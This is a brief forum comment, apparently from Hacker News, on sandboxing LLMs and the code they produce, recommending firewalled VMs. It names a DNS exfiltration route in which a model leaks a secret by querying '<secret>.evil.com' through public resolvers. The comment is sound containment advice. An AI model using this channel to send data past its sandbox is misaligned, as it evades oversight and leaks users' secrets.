| ▲ | srcreigh 6 hours ago | |
Not just the LLM, but any code that the LLM outputs also has to be firewalled. Sandboxing your LLM but then executing whatever it wants in your web browser defeats the point. CORS does not help. Also, the firewall has to block most DNS traffic, otherwise the model could query `A <secret>.evil.com` and Google/Cloudflare servers (along with everybody else) will forward the query to evil.com. Secure DNS, therefore, also can't be allowed. katakate[1] is still incomplete, but something that it is the solution here. Run the LLM and its code in firewalled VMs. | ||